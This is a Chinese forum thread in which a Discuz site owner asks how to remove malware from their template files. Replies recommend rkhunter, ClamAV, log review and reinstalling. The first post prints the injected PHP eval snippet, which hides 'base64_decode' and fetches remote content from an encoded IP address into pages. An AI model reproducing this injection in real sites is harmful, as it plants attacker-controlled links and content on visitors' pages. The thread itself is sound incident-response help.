大佬们，这个马在哪儿哪儿清除？

坐怀不乱西门庆

模版文件下多了这些

1. <!--{eval}-->
   
2. <!--
   
3. if(!$_SERVER['QUERY_STRING']){
   
4.         $vars = 'b'.'a'.'s'.'e'.'6'.'4'.'_'.'d'.'e'.'c'.'o'.'d'.'e';
   
5.         echo file_get_contents($vars("aHR0cDovLzE4My42MC4xMTEuMTczOjgwODAvbGluay9nYmsuaHRtbA=="));
   
6. }
   
7. -->
   
8. <!--{/eval}-->

复制代码

DZ论坛被挂黑链，同VPS另一个网站也被挂，root用户早已经改了端口号

您好，请联系您的程序人员检查一下网站代码是否存在漏洞，这边不是程序人员，无法协助您操作，请见谅！为了更好的为您提供优质的服务，烦请您在百忙之中抽空对该工单做出评价，感谢您的配合!

Ruclinux

排除了服务器漏洞，你要看看是不是程序漏洞。

Ruclinux

rkhunter安装使用
http://rkhunter.sourceforge.net/
wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz
tar -xzvf rkhunter-1.4.4.tar.gz
cd rkhunter-1.4.4
./installer.sh

使用
sudo rkhunter --update
sudo rkhunter - check
or
sudo rkhunter -c

更多使用方法请参考文件目录中的 files/README

Clamav安装和使用
sudo yum install gcc openssl openssl-devel  -y
http://www.clamav.net/
wget http://www.clamav.net/downloads/beta/clamav-0.99.3-beta2.tar.gz
tar -xzvf clamav-0.99.3-beta2.tar.gz
cd clamav-0.99.3-beta2
./configure && make && make install
将安装目录下的clamd.conf.sample freshclam.conf.sample 重命名为clamd.conf freshclam.conf 然后编辑配置文件即可以正常使用.
find / -name clamd.conf.sample
find / -name freshclam.conf.sample
用mv命令将找到的配置文件更名为 “去除掉后缀名中的sample”

打开freshclam.conf
#Example    注释掉这一行. 去除下面几行的注释
LogFile/usr/local/clamav/logs/clamd.log   
PidFile/usr/local/clamav/updata/clamd.pid     
DatabaseDirectory/usr/local/clamav/updata

打开clamd.conf
#Example    注释掉这一行.  去除下面几行的注释
DatabaseDirectory/usr/local/clamav/updata
UpdateLogFile/usr/local/clamav/logs/freshclam.log
PidFile/usr/local/clamav/updata/freshclam.pid

freshclam

clamscan -r –bell -i /

坐怀不乱西门庆

Ruclinux 发表于 2018-1-4 18:54
看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描

这两个有小白文档没？前两天恢复了镜像不到一天又被日了

Ruclinux

看服务项目里有没有可疑脚本或启动项
看进程里有没有可疑进程
安装个rkhunter进行扫描
安装个clamav进行扫描

坐怀不乱西门庆

删了又自动生成

funders

看web日志是如何被黑的

坐怀不乱西门庆

我是人 发表于 2018-1-4 13:48
重装。

被挂rootkit的话，没有其他办法。。。

我是说我早已经把自己的端口改了，挂马的人似乎不是通过root进去的

hxuf

你是怎么发现的

我是人

重装。

被挂rootkit的话，没有其他办法。。。